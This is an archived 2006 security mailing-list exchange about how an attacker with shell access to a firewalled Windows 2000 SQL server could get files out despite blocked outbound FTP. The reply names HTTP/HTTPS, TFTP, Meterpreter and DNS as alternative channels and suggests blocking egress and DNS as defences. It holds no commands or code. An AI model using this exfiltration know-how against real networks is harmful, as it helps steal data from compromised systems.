From: Hugo Fortier (hfortier@recon.cx)
Date: Mon Jan 30 2006 - 12:41:20 EST
I really don't see where you are going with FTP. While FTP can be
very hard to use in that kind of situation, the attacker could simply
use http or https to transfer files if those port are open. Your
issue is more than just with FTP server, FTP is probably the worst
protocol to use in that kind of situation. If your concern about him
launching the available commands from the system(aka he can't install
new program), you should also look at tftp.exe. Tftp protocol is alot
simpler than FTP, and it will work way better than FTP when you try
to bypass a firewall.
I have seen hardened windows box that had cmd.exe, ftp, tftp and a
bunch of other programs removed from the system, you basically had to
pop a CD in the system to locally admin it.
Depending on how the server have been compromised the attacker could
also be using Metasploit and Meterpreter.
Normally I like to configure my servers so that they cannot initiate
communication to untrusted ip, they can only accept connection. Also
even if you block the server to initiate outgoing communication to
the internet, the attacker might still be able to communicate the
informations with the DNS protocol, so if your really paranoid block
the server from doing dns lookup.
FTP seem to be the last resort I would use to transfer a file during
a pentest. As you dig, I am sure you'll find bigger concern than FTP.
Hugo
On 26-Jan-06, at 3:27 PM, Niels Taylor wrote:
>
> Hello list, I hope this question is not too "newbie," and I am sure
> if it is
> I will find out quickly. I am interested in ways an attacker could
> circumvent outbound FTP restrictions on a FW. I have researched
> this a bit
> but the information I am seeing is ambiguous, so I thought I'd take it
> straight to the experts.
>
> If a remote attacker gains command line access to a server (I am
> concerned
> about a Microsoft 2000 SQL server specifically) that is behind a
> firewall,
> and outbound FTP had been disabled at the FW, could the attacker
> use the MS
> FTP "Open" command to specify a different, unrestricted outbound
> port (e.g
> 80 or 443) to transfer files, (assuming of course that his FTP
> server is
> configured to listen on this port). Is this a viable scenario, and
> if not,
> could he send files via another method? This question assumes no
> outbound
> application layer inspection at the FW, so that it isn't able to
> see FTP
> traffic on port 23, or 80, for instance.
>
> Thank you for your help.
>
> Niels Taylor
>
>
>
> ----------------------------------------------------------------------
> --------
> Audit your website security with Acunetix Web Vulnerability Scanner:
>
> Hackers are concentrating their efforts on attacking applications
> on your
> website. Up to 75% of cyber attacks are launched on shopping carts,
> forms,
> login pages, dynamic content etc. Firewalls, SSL and locked-down
> servers are
> futile against web application hacking. Check your website for
> vulnerabilities
> to SQL injection, Cross site scripting and other web attacks before
> hackers do!
> Download Trial at:
>
> http://www.securityfocus.com/sponsor/pen-test_050831
> ----------------------------------------------------------------------
> ---------
>
------------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner:
Hackers are concentrating their efforts on attacking applications on your
website. Up to 75% of cyber attacks are launched on shopping carts, forms,
login pages, dynamic content etc. Firewalls, SSL and locked-down servers are
futile against web application hacking. Check your website for vulnerabilities
to SQL injection, Cross site scripting and other web attacks before hackers do!
Download Trial at:
http://www.securityfocus.com/sponsor/pen-test_050831
-------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:55:25 EDT